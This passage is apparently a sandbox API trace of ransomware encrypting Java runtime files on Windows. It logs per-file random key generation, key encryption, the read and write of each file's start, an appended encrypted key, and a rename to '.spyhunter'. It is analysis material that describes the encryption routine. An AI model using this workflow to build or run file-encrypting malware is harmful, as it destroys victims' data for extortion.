lpMem=0x2c21fc0 | out: hHeap=0x2c0000) returned 1 [0172.052] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e530 | out: pbBuffer=0x270e530) returned 1 [0172.053] GetProcessHeap () returned 0x2c0000 [0172.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0172.053] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e528*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e528*=0x30) returned 1 [0172.053] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_tw.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0172.054] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_TW.properties") returned 73 [0172.054] StrStrW (lpFirst="messages_zh_TW.properties", lpSrch=".txt") returned 0x0 [0172.054] GetProcessHeap () returned 0x2c0000 [0172.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0172.054] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e4ec*=0xea8, lpOverlapped=0x0) returned 1 [0172.133] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff158, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.133] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xea8, lpNumberOfBytesWritten=0x270e4ec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e4ec*=0xea8, lpOverlapped=0x0) returned 1 [0172.133] GetProcessHeap () returned 0x2c0000 [0172.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0172.133] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.133] WriteFile (in: hFile=0xa0, lpBuffer=0x270e52c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4ec, lpOverlapped=0x0 | out: lpBuffer=0x270e52c*, lpNumberOfBytesWritten=0x270e4ec*=0x4, lpOverlapped=0x0) returned 1 [0172.133] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4ec, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4ec*=0x30, lpOverlapped=0x0) returned 1 [0172.133] CloseHandle (hObject=0xa0) returned 1 [0172.133] GetProcessHeap () returned 0x2c0000 [0172.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.133] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_TW.properties.spyhunter") returned 83 [0172.134] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_TW.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_tw.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_zh_TW.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_zh_tw.properties.spyhunter")) returned 1 [0172.134] GetProcessHeap () returned 0x2c0000 [0172.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.134] GetProcessHeap () returned 0x2c0000 [0172.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0172.135] GetProcessHeap () returned 0x2c0000 [0172.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee49b0 | out: hHeap=0x2c0000) returned 1 [0172.135] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e528 | out: pbBuffer=0x270e528) returned 1 [0172.135] GetProcessHeap () returned 0x2c0000 [0172.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0172.135] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e520*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e520*=0x30) returned 1 [0172.135] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_sv.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0172.136] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_sv.properties") returned 70 [0172.136] StrStrW (lpFirst="messages_sv.properties", lpSrch=".txt") returned 0x0 [0172.136] GetProcessHeap () returned 0x2c0000 [0172.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0172.136] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e4e4*=0xd51, lpOverlapped=0x0) returned 1 [0172.185] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff2af, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.185] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xd51, lpNumberOfBytesWritten=0x270e4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e4e4*=0xd51, lpOverlapped=0x0) returned 1 [0172.185] GetProcessHeap () returned 0x2c0000 [0172.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0172.185] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.185] WriteFile (in: hFile=0xa0, lpBuffer=0x270e524*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4e4, lpOverlapped=0x0 | out: lpBuffer=0x270e524*, lpNumberOfBytesWritten=0x270e4e4*=0x4, lpOverlapped=0x0) returned 1 [0172.185] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4e4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4e4*=0x30, lpOverlapped=0x0) returned 1 [0172.185] CloseHandle (hObject=0xa0) returned 1 [0172.185] GetProcessHeap () returned 0x2c0000 [0172.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.186] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_sv.properties.spyhunter") returned 80 [0172.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_sv.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_sv.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_sv.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_sv.properties.spyhunter")) returned 1 [0172.187] GetProcessHeap () returned 0x2c0000 [0172.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.187] GetProcessHeap () returned 0x2c0000 [0172.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0172.187] GetProcessHeap () returned 0x2c0000 [0172.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7cb28 | out: hHeap=0x2c0000) returned 1 [0172.187] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e528 | out: pbBuffer=0x270e528) returned 1 [0172.187] GetProcessHeap () returned 0x2c0000 [0172.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0172.187] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e520*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e520*=0x30) returned 1 [0172.187] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ko.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0172.188] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ko.properties") returned 70 [0172.188] StrStrW (lpFirst="messages_ko.properties", lpSrch=".txt") returned 0x0 [0172.188] GetProcessHeap () returned 0x2c0000 [0172.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0172.188] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e4e4*=0x1657, lpOverlapped=0x0) returned 1 [0172.200] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffe9a9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.200] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1657, lpNumberOfBytesWritten=0x270e4e4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e4e4*=0x1657, lpOverlapped=0x0) returned 1 [0172.200] GetProcessHeap () returned 0x2c0000 [0172.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0172.200] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.200] WriteFile (in: hFile=0xa0, lpBuffer=0x270e524*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4e4, lpOverlapped=0x0 | out: lpBuffer=0x270e524*, lpNumberOfBytesWritten=0x270e4e4*=0x4, lpOverlapped=0x0) returned 1 [0172.200] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4e4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4e4*=0x30, lpOverlapped=0x0) returned 1 [0172.201] CloseHandle (hObject=0xa0) returned 1 [0172.201] GetProcessHeap () returned 0x2c0000 [0172.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0172.201] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ko.properties.spyhunter") returned 80 [0172.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ko.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_ko.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_ko.properties.spyhunter")) returned 1 [0172.202] GetProcessHeap () returned 0x2c0000 [0172.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0172.202] GetProcessHeap () returned 0x2c0000 [0172.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0172.202] GetProcessHeap () returned 0x2c0000 [0172.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7ca50 | out: hHeap=0x2c0000) returned 1 [0172.202] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e520 | out: pbBuffer=0x270e520) returned 1 [0172.202] GetProcessHeap () returned 0x2c0000 [0172.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0172.202] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e518*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e518*=0x30) returned 1 [0172.202] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_it.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0172.203] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_it.properties") returned 70 [0172.203] StrStrW (lpFirst="messages_it.properties", lpSrch=".txt") returned 0x0 [0172.203] GetProcessHeap () returned 0x2c0000 [0172.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0172.203] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e4dc*=0xc97, lpOverlapped=0x0) returned 1 [0172.647] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff369, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.647] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xc97, lpNumberOfBytesWritten=0x270e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e4dc*=0xc97, lpOverlapped=0x0) returned 1 [0172.647] GetProcessHeap () returned 0x2c0000 [0172.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0172.647] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.647] WriteFile (in: hFile=0xa0, lpBuffer=0x270e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4dc, lpOverlapped=0x0 | out: lpBuffer=0x270e51c*, lpNumberOfBytesWritten=0x270e4dc*=0x4, lpOverlapped=0x0) returned 1 [0172.647] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4dc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4dc*=0x30, lpOverlapped=0x0) returned 1 [0172.647] CloseHandle (hObject=0xa0) returned 1 [0172.647] GetProcessHeap () returned 0x2c0000 [0172.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.647] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_it.properties.spyhunter") returned 80 [0172.647] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_it.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\deploy\\messages_it.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\deploy\\messages_it.properties.spyhunter")) returned 1 [0172.648] GetProcessHeap () returned 0x2c0000 [0172.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.649] GetProcessHeap () returned 0x2c0000 [0172.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0172.649] GetProcessHeap () returned 0x2c0000 [0172.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7c8a0 | out: hHeap=0x2c0000) returned 1 [0172.649] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e520 | out: pbBuffer=0x270e520) returned 1 [0172.649] GetProcessHeap () returned 0x2c0000 [0172.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0172.649] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e518*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e518*=0x30) returned 1 [0172.649] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\linear_rgb.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0172.650] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\LINEAR_RGB.pf") returned 58 [0172.650] StrStrW (lpFirst="LINEAR_RGB.pf", lpSrch=".txt") returned 0x0 [0172.650] GetProcessHeap () returned 0x2c0000 [0172.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0172.650] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e4dc*=0x414, lpOverlapped=0x0) returned 1 [0172.927] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffbec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.928] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x414, lpNumberOfBytesWritten=0x270e4dc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e4dc*=0x414, lpOverlapped=0x0) returned 1 [0172.928] GetProcessHeap () returned 0x2c0000 [0172.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0172.928] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.928] WriteFile (in: hFile=0xa0, lpBuffer=0x270e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4dc, lpOverlapped=0x0 | out: lpBuffer=0x270e51c*, lpNumberOfBytesWritten=0x270e4dc*=0x4, lpOverlapped=0x0) returned 1 [0172.929] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4dc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4dc*=0x30, lpOverlapped=0x0) returned 1 [0172.929] CloseHandle (hObject=0xa0) returned 1 [0172.929] GetProcessHeap () returned 0x2c0000 [0172.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0172.930] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\LINEAR_RGB.pf.spyhunter") returned 68 [0172.930] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\LINEAR_RGB.pf" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\linear_rgb.pf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\cmm\\LINEAR_RGB.pf.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\cmm\\linear_rgb.pf.spyhunter")) returned 1 [0172.932] GetProcessHeap () returned 0x2c0000 [0172.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0172.932] GetProcessHeap () returned 0x2c0000 [0172.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0172.932] GetProcessHeap () returned 0x2c0000 [0172.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5fb80 | out: hHeap=0x2c0000) returned 1 [0172.932] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e518 | out: pbBuffer=0x270e518) returned 1 [0172.932] GetProcessHeap () returned 0x2c0000 [0172.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0172.933] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e510*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e510*=0x30) returned 1 [0172.933] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\classlist" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\classlist"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0172.934] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\classlist") returned 50 [0172.934] StrStrW (lpFirst="classlist", lpSrch=".txt") returned 0x0 [0172.934] GetProcessHeap () returned 0x2c0000 [0172.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0172.934] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e4d4*=0x2800, lpOverlapped=0x0) returned 1 [0172.940] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.940] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e4d4*=0x2800, lpOverlapped=0x0) returned 1 [0172.940] GetProcessHeap () returned 0x2c0000 [0172.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0172.940] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.940] WriteFile (in: hFile=0xa0, lpBuffer=0x270e514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4d4, lpOverlapped=0x0 | out: lpBuffer=0x270e514*, lpNumberOfBytesWritten=0x270e4d4*=0x4, lpOverlapped=0x0) returned 1 [0173.674] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4d4*=0x30, lpOverlapped=0x0) returned 1 [0173.675] CloseHandle (hObject=0xa0) returned 1 [0173.675] GetProcessHeap () returned 0x2c0000 [0173.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.675] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\classlist.spyhunter") returned 60 [0173.675] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\classlist" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\classlist"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\classlist.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\classlist.spyhunter")) returned 1 [0173.676] GetProcessHeap () returned 0x2c0000 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.676] GetProcessHeap () returned 0x2c0000 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0173.676] GetProcessHeap () returned 0x2c0000 [0173.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21f10 | out: hHeap=0x2c0000) returned 1 [0173.676] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e518 | out: pbBuffer=0x270e518) returned 1 [0173.677] GetProcessHeap () returned 0x2c0000 [0173.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0173.677] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e510*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e510*=0x30) returned 1 [0173.677] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\accessibility.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0173.678] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties") returned 65 [0173.678] StrStrW (lpFirst="accessibility.properties", lpSrch=".txt") returned 0x0 [0173.678] GetProcessHeap () returned 0x2c0000 [0173.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0173.678] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e4d4*=0x9b, lpOverlapped=0x0) returned 1 [0173.679] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffff65, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.679] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x9b, 